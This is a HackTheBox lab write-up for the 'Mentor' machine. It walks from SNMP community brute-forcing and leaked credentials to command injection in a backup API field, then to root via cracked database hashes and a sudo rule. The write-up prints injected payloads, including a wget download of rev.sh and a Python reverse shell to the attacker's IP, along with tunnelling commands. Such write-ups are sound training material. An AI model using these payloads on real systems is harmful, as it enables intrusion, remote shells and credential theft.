WriteupsHTB — Mentor
MiscMediumLinux
HTB — Mentor
SNMP v3 credential brute-force yields API secret. Command injection in backup API endpoint. PostgreSQL password enables lateral movement and sudo root.
January 15, 2025HackTheBox
#SNMP#Command Injection#API#PostgreSQL
nmap
sh
nmap -sC -sV -T4 -A -Pn -p- --open 10.10.11.193
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-15 22:53 EST
Nmap scan report for 10.10.11.193
Host is up (0.018s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 c7:3b:fc:3c:f9:ce:ee:8b:48:18:d5:d1:af:8e:c2:bb (ECDSA)
|_ 256 44:40:08:4c:0e:cb:d4:f1:8e:7e:ed:a8:5c:68:a4:f7 (ED25519)
80/tcp open http Apache httpd 2.4.52
|_http-server-header: Apache/2.4.52 (Ubuntu)
|_http-title: Did not follow redirect to http://mentorquotes.htb/
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=1/15%OT=22%CT=1%CU=34847%PV=Y%DS=2%DC=T%G=Y%TM=6788
OS:82F7%P=x86_64-pc-linux-gnu)SEQ(SP=F5%GCD=1%ISR=103%TI=Z%CI=Z%II=I%TS=A)S
OS:EQ(SP=F6%GCD=1%ISR=103%TI=Z%CI=Z%II=I%TS=A)OPS(O1=M53CST11NW7%O2=M53CST1
OS:1NW7%O3=M53CNNT11NW7%O4=M53CST11NW7%O5=M53CST11NW7%O6=M53CST11)WIN(W1=FE
OS:88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M5
OS:3CNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4
OS:(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%
OS:F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%
OS:T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%R
OS:ID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)
Network Distance: 2 hops
Service Info: Host: mentorquotes.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 22/tcp)
HOP RTT ADDRESS
1 17.93 ms 10.10.14.1
2 19.70 ms 10.10.11.193
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 35.32 seconds
nmap udp
sh
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-15 23:41 EST
Nmap scan report for mentorquotes.htb (10.10.11.193)
Host is up (0.017s latency).
PORT STATE SERVICE VERSION
22/udp closed ssh
110/udp closed pop3
143/udp closed imap
161/udp open snmp SNMPv1 server; net-snmp SNMPv3 server (public)
| snmp-info:
| enterprise: net-snmp
| engineIDFormat: unknown
| engineIDData: a124f60a99b99c6200000000
| snmpEngineBoots: 67
|_ snmpEngineTime: 48m04s
| snmp-sysdescr: Linux mentor 5.15.0-56-generic #62-Ubuntu SMP Tue Nov 22 19:54:14 UTC 2022 x86_64
|_ System uptime: 48m4.06s (288406 timeticks)
993/udp closed imaps
995/udp closed pop3s
Service Info: Host: mentor
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 0.57 seconds80
sh
feroxbuster --url http://mentorquotes.htb/
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.10.3
───────────────────────────┬──────────────────────
🎯 Target Url │ http://mentorquotes.htb/
🚀 Threads │ 50
📖 Wordlist │ /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
👌 Status Codes │ All Status Codes!
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.10.3
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🔎 Extract Links │ true
🏁 HTTP methods │ [GET]
🔃 Recursion Depth │ 4
🎉 New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404 GET 4l 34w 232c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200 GET 167l 621w 5506c http://mentorquotes.htb/
403 GET 9l 28w 281c http://mentorquotes.htb/server-status
[####################] - 2m 30000/30000 0s found:2 errors:49
[####################] - 2m 30000/30000 321/s http://mentorquotes.htb/ sh
dirsearch -u http://mentorquotes.htb/server-status
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460
Output File: /home/sake/htb-labs/Mentor/reports/http_mentorquotes.htb/_server-status_25-01-15_23-39-25.txt
Target: http://mentorquotes.htb/
[23:39:25] Starting: server-status/
[23:39:26] 404 - 232B - /server-status/%2e%2e//google.com
CTRL+C detected: Pausing threads, please wait...
[q]uit / [c]ontinue: snmp
sh
snmpwalk -v2c -c public 10.10.11.193
SNMPv2-MIB::sysDescr.0 = STRING: Linux mentor 5.15.0-56-generic #62-Ubuntu SMP Tue Nov 22 19:54:14 UTC 2022 x86_64
SNMPv2-MIB::sysObjectID.0 = OID: NET-SNMP-MIB::netSnmpAgentOIDs.10
DISMAN-EVENT-MIB::sysUpTimeInstance = Timeticks: (297730) 0:49:37.30
SNMPv2-MIB::sysContact.0 = STRING: Me <admin@mentorquotes.htb>
SNMPv2-MIB::sysName.0 = STRING: mentor
SNMPv2-MIB::sysLocation.0 = STRING: Sitting on the Dock of the Bay
SNMPv2-MIB::sysServices.0 = INTEGER: 72
SNMPv2-MIB::sysORLastChange.0 = Timeticks: (2) 0:00:00.02
SNMPv2-MIB::sysORID.1 = OID: SNMP-FRAMEWORK-MIB::snmpFrameworkMIBCompliance
SNMPv2-MIB::sysORID.2 = OID: SNMP-MPD-MIB::snmpMPDCompliance
SNMPv2-MIB::sysORID.3 = OID: SNMP-USER-BASED-SM-MIB::usmMIBCompliance
SNMPv2-MIB::sysORID.4 = OID: SNMPv2-MIB::snmpMIB
SNMPv2-MIB::sysORID.5 = OID: SNMP-VIEW-BASED-ACM-MIB::vacmBasicGroup
SNMPv2-MIB::sysORID.6 = OID: TCP-MIB::tcpMIB
SNMPv2-MIB::sysORID.7 = OID: UDP-MIB::udpMIB
SNMPv2-MIB::sysORID.8 = OID: IP-MIB::ip
SNMPv2-MIB::sysORID.9 = OID: SNMP-NOTIFICATION-MIB::snmpNotifyFullCompliance
SNMPv2-MIB::sysORID.10 = OID: NOTIFICATION-LOG-MIB::notificationLogMIB
SNMPv2-MIB::sysORDescr.1 = STRING: The SNMP Management Architecture MIB.
SNMPv2-MIB::sysORDescr.2 = STRING: The MIB for Message Processing and Dispatching.
SNMPv2-MIB::sysORDescr.3 = STRING: The management information definitions for the SNMP User-based Security Model.
SNMPv2-MIB::sysORDescr.4 = STRING: The MIB module for SNMPv2 entities
SNMPv2-MIB::sysORDescr.5 = STRING: View-based Access Control Model for SNMP.
SNMPv2-MIB::sysORDescr.6 = STRING: The MIB module for managing TCP implementations
SNMPv2-MIB::sysORDescr.7 = STRING: The MIB module for managing UDP implementations
SNMPv2-MIB::sysORDescr.8 = STRING: The MIB module for managing IP and ICMP implementations
SNMPv2-MIB::sysORDescr.9 = STRING: The MIB modules for managing SNMP Notification, plus filtering.
SNMPv2-MIB::sysORDescr.10 = STRING: The MIB module for logging SNMP Notifications.
SNMPv2-MIB::sysORUpTime.1 = Timeticks: (2) 0:00:00.02
SNMPv2-MIB::sysORUpTime.2 = Timeticks: (2) 0:00:00.02
SNMPv2-MIB::sysORUpTime.3 = Timeticks: (2) 0:00:00.02
SNMPv2-MIB::sysORUpTime.4 = Timeticks: (2) 0:00:00.02
SNMPv2-MIB::sysORUpTime.5 = Timeticks: (2) 0:00:00.02
SNMPv2-MIB::sysORUpTime.6 = Timeticks: (2) 0:00:00.02
SNMPv2-MIB::sysORUpTime.7 = Timeticks: (2) 0:00:00.02
SNMPv2-MIB::sysORUpTime.8 = Timeticks: (2) 0:00:00.02
SNMPv2-MIB::sysORUpTime.9 = Timeticks: (2) 0:00:00.02
SNMPv2-MIB::sysORUpTime.10 = Timeticks: (2) 0:00:00.02
HOST-RESOURCES-MIB::hrSystemUptime.0 = Timeticks: (299564) 0:49:55.64
HOST-RESOURCES-MIB::hrSystemDate.0 = STRING: 2025-1-16,4:44:28.0,+0:0
HOST-RESOURCES-MIB::hrSystemInitialLoadDevice.0 = INTEGER: 393216
HOST-RESOURCES-MIB::hrSystemInitialLoadParameters.0 = STRING: "BOOT_IMAGE=/vmlinuz-5.15.0-56-generic root=/dev/mapper/ubuntu--vg-ubuntu--lv ro net.ifnames=0 biosdevname=0
"
HOST-RESOURCES-MIB::hrSystemNumUsers.0 = Gauge32: 0
HOST-RESOURCES-MIB::hrSystemProcesses.0 = Gauge32: 228
HOST-RESOURCES-MIB::hrSystemMaxProcesses.0 = INTEGER: 0
HOST-RESOURCES-MIB::hrSystemMaxProcesses.0 = No more variables left in this MIB View (It is past the end of the MIB tree)sh
snmpwalk -c public -v2c 10.10.11.193 NET-SNMP-EXTEND-MIB::nsExtendOutputFull
NET-SNMP-EXTEND-MIB::nsExtendOutputFull = No more variables left in this MIB View (It is past the end of the MIB tree)vhost fuzzing
sh
ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ -u http://mentorquotes.htb/ -H 'Host: FUZZ.mentorquotes.htb' -fw 18 -mc all
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://mentorquotes.htb/
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt
:: Header : Host: FUZZ.mentorquotes.htb
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: all
:: Filter : Response words: 18
________________________________________________
api [Status: 404, Size: 22, Words: 2, Lines: 1, Duration: 24ms]
api.mentorquotes.htb
sh
feroxbuster --url http://api.mentorquotes.htb/
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.10.3
───────────────────────────┬──────────────────────
🎯 Target Url │ http://api.mentorquotes.htb/
🚀 Threads │ 50
📖 Wordlist │ /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
👌 Status Codes │ All Status Codes!
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.10.3
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🔎 Extract Links │ true
🏁 HTTP methods │ [GET]
🔃 Recursion Depth │ 4
🎉 New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404 GET 1l 2w 22c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
307 GET 0l 0w 0c http://api.mentorquotes.htb/admin => http://api.mentorquotes.htb/admin/
200 GET 69l 212w 2637c http://api.mentorquotes.htb/docs/oauth2-redirect
200 GET 1l 48w 7676c http://api.mentorquotes.htb/openapi.json
307 GET 0l 0w 0c http://api.mentorquotes.htb/docs/ => http://api.mentorquotes.htb/docs
200 GET 31l 62w 969c http://api.mentorquotes.htb/docs
307 GET 0l 0w 0c http://api.mentorquotes.htb/users => http://api.mentorquotes.htb/users/
307 GET 0l 0w 0c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
405 GET 1l 3w 31c http://api.mentorquotes.htb/users/add
422 GET 1l 3w 186c http://api.mentorquotes.htb/admin/check
[####################] - 84s 90005/90005 0s found:8 errors:16262
[####################] - 83s 30000/30000 362/s http://api.mentorquotes.htb/
[####################] - 83s 30000/30000 359/s http://api.mentorquotes.htb/admin/
[####################] - 83s 30000/30000 364/s http://api.mentorquotes.htb/users/ => Wildcard dir! stopped recursion snmprbute
- https://github.com/SECFORCE/SNMP-Brute
- the other tool onexystone was not picking up
internalstring
sh
python3 snmpbrute.py -t 10.10.11.193
_____ _ ____ _______ ____ __
/ ___// | / / |/ / __ \ / __ )_______ __/ /____
\__ \/ |/ / /|_/ / /_/ / / __ / ___/ / / / __/ _ \
___/ / /| / / / / ____/ / /_/ / / / /_/ / /_/ __/
/____/_/ |_/_/ /_/_/ /_____/_/ \__,_/\__/\___/
SNMP Bruteforce & Enumeration Script v2.0
http://www.secforce.com / nikos.vassakis <at> secforce.com
###############################################################
Trying ['', '0', '0392a0', '1234', '2read', '3com', '3Com', '3COM', '4changes', 'access', 'adm', 'admin', 'Admin', 'administrator', 'agent', 'agent_steal', 'all', 'all private', 'all public', 'anycom', 'ANYCOM', 'apc', 'bintec', 'blue', 'boss', 'c', 'C0de', 'cable-d', 'cable_docsispublic@es0', 'cacti', 'canon_admin', 'cascade', 'cc', 'changeme', 'cisco', 'CISCO', 'cmaker', 'comcomcom', 'community', 'core', 'CR52401', 'crest', 'debug', 'default', 'demo', 'dilbert', 'enable', 'entry', 'field', 'field-service', 'freekevin', 'friend', 'fubar', 'guest', 'hello', 'hideit', 'host', 'hp_admin', 'ibm', 'IBM', 'ilmi', 'ILMI', 'intel', 'Intel', 'intermec', 'Intermec', 'internal', 'internet', 'ios', 'isdn', 'l2', 'l3', 'lan', 'liteon', 'login', 'logon', 'lucenttech', 'lucenttech1', 'lucenttech2', 'manager', 'master', 'microsoft', 'mngr', 'mngt', 'monitor', 'mrtg', 'nagios', 'net', 'netman', 'network', 'nobody', 'NoGaH$@!', 'none', 'notsopublic', 'nt', 'ntopia', 'openview', 'operator', 'OrigEquipMfr', 'ourCommStr', 'pass', 'passcode', 'password', 'PASSWORD', 'pr1v4t3', 'pr1vat3', 'private', ' private', 'private ', 'Private', 'PRIVATE', 'private@es0', 'Private@es0', 'private@es1', 'Private@es1', 'proxy', 'publ1c', 'public', ' public', 'public ', 'Public', 'PUBLIC', 'public@es0', 'public@es1', 'public/RO', 'read', 'read-only', 'readwrite', 'read-write', 'red', 'regional', '<removed>', 'rmon', 'rmon_admin', 'ro', 'root', 'router', 'rw', 'rwa', 'sanfran', 'san-fran', 'scotty', 'secret', 'Secret', 'SECRET', 'Secret C0de', 'security', 'Security', 'SECURITY', 'seri', 'server', 'snmp', 'SNMP', 'snmpd', 'snmptrap', 'snmp-Trap', 'SNMP_trap', 'SNMPv1/v2c', 'SNMPv2c', 'solaris', 'solarwinds', 'sun', 'SUN', 'superuser', 'supervisor', 'support', 'switch', 'Switch', 'SWITCH', 'sysadm', 'sysop', 'Sysop', 'system', 'System', 'SYSTEM', 'tech', 'telnet', 'TENmanUFactOryPOWER', 'test', 'TEST', 'test2', 'tiv0li', 'tivoli', 'topsecret', 'traffic', 'trap', 'user', 'vterm1', 'watch', 'watchit', 'windows', 'windowsnt', 'workstation', 'world', 'write', 'writeit', 'xyzzy', 'yellow', 'ILMI'] community strings ...
10.10.11.193 : 161 Version (v2c): internal
10.10.11.193 : 161 Version (v1): public
10.10.11.193 : 161 Version (v2c): public
10.10.11.193 : 161 Version (v1): public
10.10.11.193 : 161 Version (v2c): public
Waiting for late packets (CTRL+C to stop)
Trying identified strings for READ-WRITE ...
Identified Community strings
0) 10.10.11.193 internal (v2c)(RO)
1) 10.10.11.193 public (v1)(RO)
2) 10.10.11.193 public (v2c)(RO)
3) 10.10.11.193 public (v1)(RO)
4) 10.10.11.193 public (v2c)(RO)
sh
HOST-RESOURCES-MIB::hrSWRunParameters.2135 = STRING: "/usr/local/bin/login.py kj23sadkj123as0-d213"
username
james@mentorquotes
- credential worked with
james@mentorquotes.htb:kj23sadkj123as0-d213
sh
curl -X GET http://api.mentorquotes.htb/users/ \
-H "Authorization: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6ImphbWVzIiwiZW1haWwiOiJqYW1lc0BtZW50b3JxdW90ZXMuaHRiIn0.peGpmshcF666bimHkYIBKQN7hj5m785uKcjwbD--Na0" \
-H "Accept: application/json" | jq
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 250 100 250 0 0 5417 0 --:--:-- --:--:-- --:--:-- 5555
[
{
"id": 1,
"email": "james@mentorquotes.htb",
"username": "james"
},
{
"id": 2,
"email": "svc@mentorquotes.htb",
"username": "service_acc"
},
{
"id": 4,
"email": "test@mentorquotes.htb",
"username": "tester"
},
{
"id": 5,
"email": "test@mentorquotes.com",
"username": "testing"
}
]
dir search apit.mentorquotes.htb
sh
feroxbuster --url http://api.mentorquotes.htb/
404 GET 1l 2w 22c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
307 GET 0l 0w 0c http://api.mentorquotes.htb/admin => http://api.mentorquotes.htb/admin/
200 GET 69l 212w 2637c http://api.mentorquotes.htb/docs/oauth2-redirect
307 GET 0l 0w 0c http://api.mentorquotes.htb/docs/ => http://api.mentorquotes.htb/docs
307 GET 0l 0w 0c http://api.mentorquotes.htb/users => http://api.mentorquotes.htb/users/
200 GET 1l 48w 7676c http://api.mentorquotes.htb/openapi.json
200 GET 31l 62w 969c http://api.mentorquotes.htb/docs
307 GET 0l 0w 0c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
405 GET 1l 3w 31c http://api.mentorquotes.htb/admin/backup
403 GET 9l 28w 285c http://api.mentorquotes.htb/server-status
[####################] - 84s 90005/90005 0s found:8 errors:8842
[####################] - 83s 30000/30000 361/s http://api.mentorquotes.htb/
[####################] - 83s 30000/30000 360/s http://api.mentorquotes.htb/admin/
[####################] - 83s 30000/30000 360/s http://api.mentorquotes.htb/users/ => Wildcard dir! stopped recursion /admin/
txt
{
"path": "/etc/passwd; sleep 1;"
} txt
{
"path": "/etc/passwd; ping 10.10.14.6;"
} sh
tcpdump -i tun0
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes
11:33:53.337382 IP 10.10.14.6.38564 > mentorquotes.htb.http: Flags [S], seq 863935829, win 64240, options [mss 1460,sackOK,TS val 3980515860 ecr 0,nop,wscale 7], length 0
11:33:53.353896 IP mentorquotes.htb.http > 10.10.14.6.38564: Flags [S.], seq 3761899283, ack 863935830, win 65160, options [mss 1340,sackOK,TS val 2566650271 ecr 3980515860,nop,wscale 7], length 0
11:33:53.353947 IP 10.10.14.6.38564 > mentorquotes.htb.http: Flags [.], ack 1, win 502, options [nop,nop,TS val 3980515876 ecr 2566650271], length 0
11:33:53.354129 IP 10.10.14.6.38564 > mentorquotes.htb.http: Flags [P.], seq 1:403, ack 1, win 502, options [nop,nop,TS val 3980515876 ecr 2566650271], length 402: HTTP: POST /admin/backup HTTP/1.1
11:33:53.371971 IP mentorquotes.htb.http > 10.10.14.6.38564: Flags [.], ack 403, win 506, options [nop,nop,TS val 2566650288 ecr 3980515876], length 0
11:33:53.381066 IP mentorquotes.htb > 10.10.14.6: ICMP echo request, id 20992, seq 0, length 64
11:33:53.381087 IP 10.10.14.6 > mentorquotes.htb: ICMP echo reply, id 20992, seq 0, length 64
11:33:54.382626 IP mentorquotes.htb > 10.10.14.6: ICMP echo request, id 20992, seq 1, length 64
11:33:54.382641 IP 10.10.14.6 > mentorquotes.htb: ICMP echo reply, id 20992, seq 1, length 64
11:33:55.382350 IP mentorquotes.htb > 10.10.14.6: ICMP echo request, id 20992, seq 2, length 64sh
{
"path": "/etc/passwd; wget http://10.10.14.6/rev.sh ;"
}
{
"path": "/etc/passwd; chmod +x rev.sh ;"
} - need to escape the double quotes by adding a backslash
sh
{
"path": "/etc/passwd; python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.14.6\",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(\"sh\")' ;"
}sh
nc -lnvp 1234
listening on [any] 1234 ...
connect to [10.10.14.6] from (UNKNOWN) [10.10.11.193] 38766
/app # ^[[13;8Rwhoami
whoami
root
user.txt
sh
cd /home
/home # ^[[26;9Rls
ls
svc
/home # ^[[26;9Rcd svc
cd svc
/home/svc # ^[[26;13Rls
ls
user.txt
/home/svc # ^[[26;13Rcat user.txt
cat user.txt
9c2501ee...sh
/app/app # cat db.py
cat db.py
import os
from sqlalchemy import (Column, DateTime, Integer, String, Table, create_engine, MetaData)
from sqlalchemy.sql import func
from databases import Database
# Database url if none is passed the default one is used
DATABASE_URL = os.getenv("DATABASE_URL", "postgresql://postgres:postgres@172.22.0.1/mentorquotes_db")sh
cd /opt
wget http://10.10.14.6/chiselsh
pwd
/app/app
/app/app # ^[[26;12Rcat db.py
cat db.py
import os
from sqlalchemy import (Column, DateTime, Integer, String, Table, create_engine, MetaData)
from sqlalchemy.sql import func
from databases import Database
# Database url if none is passed the default one is used
DATABASE_URL = os.getenv("DATABASE_URL", "postgresql://postgres:postgres@172.22.0.1/mentorquotes_db")sh
./chisel server --reverse --port 1234- this will be run on the target machine since it is connecting trhough docker and its internal is
172.22.0.1will use that as the reverse connection
sh
./chisel client 10.10.14.6:1234 R:5432:172.22.0.1:5432sh
psql -h localhost -U postgres --password 'postgres' -d mentorquotes_db
psql: warning: extra command-line argument "postgres" ignored
Password: postgressh
mentorquotes_db-# \list
List of databases
Name | Owner | Encoding | Locale Provider | Collate | Ctype | ICU Locale | ICU Rules | Access privileges
-----------------+----------+----------+-----------------+------------+------------+------------+-----------+-----------------------
mentorquotes_db | postgres | UTF8 | libc | en_US.utf8 | en_US.utf8 | | |
postgres | postgres | UTF8 | libc | en_US.utf8 | en_US.utf8 | | |
template0 | postgres | UTF8 | libc | en_US.utf8 | en_US.utf8 | | | =c/postgres +
| | | | | | | | postgres=CTc/postgres
template1 | postgres | UTF8 | libc | en_US.utf8 | en_US.utf8 | | | =c/postgres +
| | | | | | | | postgres=CTc/postgres
(4 rows)sh
mentorquotes_db=# \c mentorquotes_db
Password: postgres
psql (16.3 (Debian 16.3-1+b1), server 13.7 (Debian 13.7-1.pgdg110+1))
You are now connected to database "mentorquotes_db" as user "postgres".
mentorquotes_db=# \d
List of relations
Schema | Name | Type | Owner
--------+---------------+----------+----------
public | cmd_exec | table | postgres
public | quotes | table | postgres
public | quotes_id_seq | sequence | postgres
public | users | table | postgres
public | users_id_seq | sequence | postgres
(5 rows)sh
mentorquotes_db=# select * from users;
id | email | username | password
----+------------------------+-------------+----------------------------------
1 | james@mentorquotes.htb | james | 7ccdcd8c...
2 | svc@mentorquotes.htb | service_acc | 53f22d0d...
(2 rows)hashcat
sh
hashcat -m 0 '53f22d0d...' /usr/share/wordlists/rockyou.txt
53f22d0d...:123meunomeeivanisvc:123meunomeeivani
ssh as svc
sh
ssh svc@10.10.11.193
123meunomeeivanish
╔══════════╣ Active Ports
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#open-ports
tcp 0 0 172.22.0.1:81 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:46489 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 172.22.0.1:5432 0.0.0.0:* LISTEN -
tcp 0 0 172.22.0.1:8000 0.0.0.0:* LISTEN -
tcp6 0 0 :::80 :::* LISTEN -
tcp6 0 0 :::22 :::* LISTEN - sh
svc@mentor:/etc$ grep -rn ./ -ie "pass"
grep: ./sudoers.d/README: Permission denied
./snmp/snmpd.conf:78:# createUser username (MD5|SHA|SHA-512|SHA-384|SHA-256|SHA-224) authpassphrase [DES|AES] [privpassphrase]
./snmp/snmpd.conf:92:createUser bootstrap MD5 SuperSecurePassword123__ DES
searching for james password
sh
svc@mentor:/etc/snmp$ cat snmpd.conf
...
...
createUser bootstrap MD5 SuperSecurePassword123__ DES
rouser bootstrap priv
com2sec AllUser default internal
group AllGroup v2c AllUser
#view SystemView included .1.3.6.1.2.1.1
view SystemView included .1.3.6.1.2.1.25.1.1
view AllView included .1
acess AllGroup "" any noauth exact AllView none nonessh as james
sh
svc@mentor:/etc/snmp$ su james
Password: SuperSecurePassword123__sudo
sh
james@mentor:~$ sudo -l
[sudo] password for james:
Matching Defaults entries for james on mentor:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
User james may run the following commands on mentor:
(ALL) /bin/shsh
james@mentor:~$ sudo /bin/sh
# whoami
rootroot.txt
sh
# cat /root/root.txt
2477fb6b...Up next
EasyJan 2025
HTB — Usage
Laravel admin panel SQL injection via search parameter. Malicious PNG for RCE via file upload. Wildcard file read on sudo binary for root flag.
Read writeup
EasyJan 2025
HTB — Buff
Gym Management Software RCE via unauthenticated file upload. CloudMe buffer overflow with port forwarding for privilege escalation.
Read writeup
EasyJan 2025
HTB — Devvortex
Joomla CVE-2023-23752 info disclosure leaks database creds. Authenticated template RCE for shell. Apport crash handler sudo exploit for root.
Read writeup